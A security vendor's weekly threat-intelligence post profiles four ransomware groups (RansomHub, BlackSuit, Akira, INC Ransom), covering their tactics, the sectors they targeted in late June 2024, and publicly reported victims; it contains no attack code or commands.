Ransomware on the Move: RansomHub, BlackSuit, Akira, INC Ransom


July 10, 2024

World map

Halcyon publishes a quarterly RaaS and data extortion group reference guide, Power Rankings: Ransomware Malicious Quartile. Here's the ransomware gangs on the move last week:  

During the week of June 24 to June 30, the cybersecurity landscape was significantly disrupted by a surge in ransomware attacks targeting various organizations across multiple sectors.  

This period saw high-profile ransomware incidents that disrupted operations and exposed sensitive data, highlighting ongoing vulnerabilities in digital defenses. The top four ransomware groups during this week were BlackSuit, Akira, RansomHub, and INC Ransom, demonstrating their relentless pursuit of ransom through sophisticated cyber-attacks.


The sectors most targeted by these ransomware groups were the Manufacturing sector with seven incidents reported. This was followed by Business Services with four cases, and Construction with three cases, underscoring the susceptibility of these sectors to ransomware threats.  

Other affected sectors included Finance, Agriculture, Software, Education, Government, Media & Internet, Healthcare Services, Transportation, Law Firms & Legal Services, Real Estate, and Energy, Utilities & Waste.


These attacks by the four combined groups represent 50% of the total attacks registered in our database for the week, underscoring the severe impact of these ransomware groups and the urgent need for enhanced cybersecurity measures.  


RansomHub is a new ransomware group that has recently emerged in the cyber threat landscape, distinguishing themselves by making claims and backing them up with data leaks. The group is believed to have roots in Russia, with operations resembling a traditional Russian ransomware setup.  

RansomHub operates as a Ransomware-as-a-Service (RaaS) group, with affiliates receiving 90% of the ransom money and the remaining 10% going to the main group. Their ransomware strains are written in Golang, which is a relatively new trend in the ransomware world.  

This language choice may indicate a step towards future trends, as other recent ransomware strains, such as GhostSec and GhostLocker, have also been written in Golang. RansomHub targets various countries, including the US, Brazil, Indonesia, and Vietnam, without following a specific pattern, and healthcare institutions are among their notable victims.

Sicoob Bank, a prominent Brazilian financial cooperative, reported that RansomHub exfiltrated over 1 TB of sensitive data, including NDA documents, customer and employee personal data, financial information, and IT product source codes. Similarly, Spandex AG, a leading global supplier in the graphics and signage industry, experienced a breach that compromised confidential business data.  

These incidents highlight RansomHub's capability to significantly disrupt operations and compromise critical data integrity across various sectors. Sicoob Bank, with over 7.6 million members and substantial financial activities, and Spandex AG, with revenues exceeding €200 million, underscore the financial and operational impacts of these attacks.

Significant Attacks

  • Spandex AG, a Switzerland-based global supplier of materials and equipment for the sign-making, graphics, and vehicle wrapping markets, faced a significant breach by RansomHub. The attack led to the theft of confidential business data, raising concerns about the company's data security measures. Spandex AG, with a revenue of over €200 million and operations in 19 countries, exemplifies the high value targets that ransomware groups like RansomHub aim for in their attacks.
  • Midam Architectural Firm Co., LTD, a renowned South Korean architecture firm, experienced a ransomware attack by RansomHub, resulting in the exfiltration of 370GB of data. The attackers planned to auction the stolen information, threatening to publish it if unsold. This incident emphasizes the increasing threat of ransomware attacks on companies in various sectors, including architecture, which often handle significant amounts of sensitive data.


BlackSuit is a ransomware family that emerged in 2023, closely related to the notorious Royal ransomware group. This malware targets both Windows and Linux systems, including VMware ESXi servers, appending the .blacksuit extension to encrypted files and dropping a ransom note named README.BlackSuit.txt.

Victims are directed to a Tor chat site for negotiations. Researchers have found that BlackSuit and Royal ransomware share over 98% similarity in their functions and code, suggesting that BlackSuit may be a new variant developed by the same authors, a copycat, or an affiliate of the Royal ransomware gang. BlackSuit's emergence highlights the continued evolution of ransomware threats, with significant potential for widespread impact.

BlackSuit's attacks typically involve the exfiltration of substantial amounts of sensitive data, posing severe risks to the affected organizations. For instance, Hiawatha Homes, Inc., a non-profit organization providing support services for individuals with disabilities, experienced a breach involving 106,336 files totaling over 40 billion bytes.  

The compromised data included sensitive information from various departments such as finance, human resources, and public relations. These breaches demonstrate BlackSuit's capability to significantly disrupt operations and compromise critical data integrity.  

Significant Attacks

  • Youngs Timber & Builders Merchants, a leading supplier of building materials and timber products, was hit by a ransomware attack from the BlackSuit group on June 26, 2024. This incident has sparked major concerns regarding the security of the company's data and operations. The extent of the data breach is still unclear, but the company's estimated revenue is $5.6 million.
  • KADOKAWA Corporation, a prominent Japanese media conglomerate with significant influence in publishing, anime, and video games, was targeted by BlackSuit on June 8, 2024. The attack compromised personal details of students, graduates, and employees associated with DWANGO Co., Ltd. Despite assurances that customer credit card information was not leaked, the incident underscores the challenges faced by major media companies.


Akira is a new and rapidly growing ransomware family that first emerged in March 2023. The group has quickly distinguished itself by targeting small to medium-sized businesses across various sectors including government, manufacturing, technology, education, consulting, pharmaceuticals, and telecommunications in Europe, North America, and Australia.

Believed to be affiliated with the now-defunct Conti ransomware gang, Akira shares similarities in code with Conti. The group employs double extortion tactics, stealing data before encrypting systems and demanding a ransom for both decryption and data deletion, with demands ranging from $200,000 to over $4 million.  

Akira's operations are marked by their unique dark web leak site, featuring a retro 1980s-style green-on-black interface, and their use of tools like RClone, FileZilla, and WinSCP for data exfiltration. As of January 2024, Akira has claimed over 250 victims and $42 million in ransomware proceeds, making them a significant and evolving threat in the cyber landscape.

Akira's attacks typically involve the exfiltration of substantial amounts of sensitive data, posing severe risks to the affected organizations. Power Lube Industrial, a manufacturer of industrial lubrication equipment, suffered a breach with attackers threatening to release financial data, bank details, customer information, and NDAs. The total data exfiltrated remains unspecified, but the breach has significant implications given Power Lube Industrial’s annual revenue of $10 million.  

Similarly, Waterbury Newton, a well-established law firm in Kentville, Nova Scotia, was also targeted, with the attack compromising sensitive legal documents and client information. The full extent of the data breach remains unknown, but the potential implications for client confidentiality and legal operations are profound.  

Significant Attacks

  • PCI Developments, a leading real estate developer in Vancouver, fell victim to a ransomware attack by Akira, resulting in the exfiltration of 570GB of sensitive data. This breach involved client agreements, financial files, and confidential reports, reflecting the extensive impact on the company's operations and client trust.
  • Wilmots, a respected law firm specializing in conveyancing, probate, trusts, and classic car litigation, has been attacked by the Akira ransomware group. The attackers have threatened to release sensitive personal documents, including passports, birth certificates, and driver's licenses of clients, as well as numerous court documents and hearing records. This breach significantly jeopardizes the privacy and security of Wilmots' clients. The firm, based in Cirencester, Gloucestershire, UK, is known for its bespoke legal advice and traditional service values, employing nine SRA-regulated solicitors.

INC Ransom

INC Ransom is a highly sophisticated ransomware group that has gained significant notoriety in the cyber threat landscape. Emerging in 2023, the group is distinguished by its targeted ransomware attacks on corporate and organizational networks, employing advanced techniques such as spear-phishing campaigns and exploiting vulnerabilities like CVE-2023-3519 in Citrix NetScaler.  

INC Ransom operates using both Commercial Off-The-Shelf (COTS) software and legitimate system tools for reconnaissance and lateral movement within networks. Their attacks involve not only encrypting data but also stealing it, with threats to release the stolen information publicly if ransom demands are not met—a tactic known as double extortion. INC Ransom has targeted various industries, including healthcare, education, government entities, and technology companies, with notable breaches including Xerox Corp and NHS Scotland.

For instance, the City of Coon Rapids, Minnesota, experienced a ransomware attack where INC Ransom claimed to have accessed and exfiltrated extensive municipal data. With the city's estimated revenue at $40.9 million, the potential scale of the breach is significant. Similarly, Planar Systems Inc., a leading U.S. provider of digital display solutions based in Beaverton, Oregon, has been also targeted by the group. The company's extensive product portfolio includes high-resolution LED video walls, LCD video walls, large format LCD displays, interactive touch screens, and transparent OLED displays, serving industries such as retail, corporate, education, and healthcare.

Significant Attacks